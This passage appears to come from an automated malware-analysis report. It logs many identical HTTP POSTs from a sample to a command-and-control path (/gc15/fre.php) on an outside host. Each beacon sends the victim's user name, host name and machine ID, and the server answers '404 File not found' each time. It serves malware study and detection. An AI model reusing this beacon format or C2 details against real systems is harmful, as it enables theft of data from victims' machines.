                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:17.348575115 CET | 12495 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:18.654022932 CET | 12495 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:59 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                21 | 192.168.2.6 | 49842 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:38:20.171529055 CET | 12496 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:20.238980055 CET | 12496 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:21.628648043 CET | 12496 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:02 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                22 | 192.168.2.6 | 49845 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:38:23.240806103 CET | 12504 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:23.307615995 CET | 12504 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:24.676434040 CET | 12504 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:05 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                23 | 192.168.2.6 | 49850 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:38:27.482882977 CET | 12520 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:27.550404072 CET | 12520 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:28.925374031 CET | 12521 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:09 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                24 | 192.168.2.6 | 49851 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:38:31.054519892 CET | 12521 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:31.112103939 CET | 12522 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:32.352724075 CET | 12522 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:12 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                25 | 192.168.2.6 | 49852 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:38:33.510654926 CET | 12523 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:33.577954054 CET | 12523 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:35.007775068 CET | 12524 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:15 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                26 | 192.168.2.6 | 49854 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:38:37.134931087 CET | 12525 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:37.202991009 CET | 12530 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:38.454946995 CET | 12534 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:19 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                27 | 192.168.2.6 | 49855 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:38:40.133790970 CET | 12535 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:40.201057911 CET | 12535 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:41.392921925 CET | 12542 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:21 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                28 | 192.168.2.6 | 49862 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:38:42.445022106 CET | 12553 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:42.514592886 CET | 12555 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:43.841937065 CET | 12567 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:24 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                29 | 192.168.2.6 | 49870 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:38:46.720808029 CET | 12578 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:46.777277946 CET | 12579 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:48.177226067 CET | 12591 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:28 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                3 | 192.168.2.6 | 49773 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:37:17.458668947 CET | 1344 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:17.514823914 CET | 1344 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:18.890583992 CET | 1344 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:38:59 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                30 | 192.168.2.6 | 49881 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:38:49.452650070 CET | 12601 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:49.508902073 CET | 12601 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:50.674108982 CET | 12602 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:31 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                31 | 192.168.2.6 | 49882 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:38:52.315956116 CET | 12602 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:52.383330107 CET | 12603 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:53.689454079 CET | 12603 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:34 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                32 | 192.168.2.6 | 49883 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:38:54.799525976 CET | 12604 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:54.866242886 CET | 12604 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:56.145380974 CET | 12604 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:36 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                33 | 192.168.2.6 | 49885 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:38:57.255335093 CET | 12606 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:57.322833061 CET | 12612 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:58.636996984 CET | 12613 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:39 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                34 | 192.168.2.6 | 49886 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:39:00.138022900 CET | 12613 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:39:00.207024097 CET | 12614 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:39:01.668778896 CET | 12614 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:41 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                4 | 192.168.2.6 | 49774 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:37:20.261991978 CET | 1345 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:20.318430901 CET | 1345 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:21.668706894 CET | 1346 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:02 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                5 | 192.168.2.6 | 49775 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:37:22.809911013 CET | 1346 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:22.905011892 CET | 1347 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:24.212196112 CET | 1347 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:04 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                6 | 192.168.2.6 | 49776 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:37:25.398463011 CET | 1348 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:25.455180883 CET | 1348 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:26.758080006 CET | 1348 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:07 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                7 | 192.168.2.6 | 49779 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:37:29.263305902 CET | 1372 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
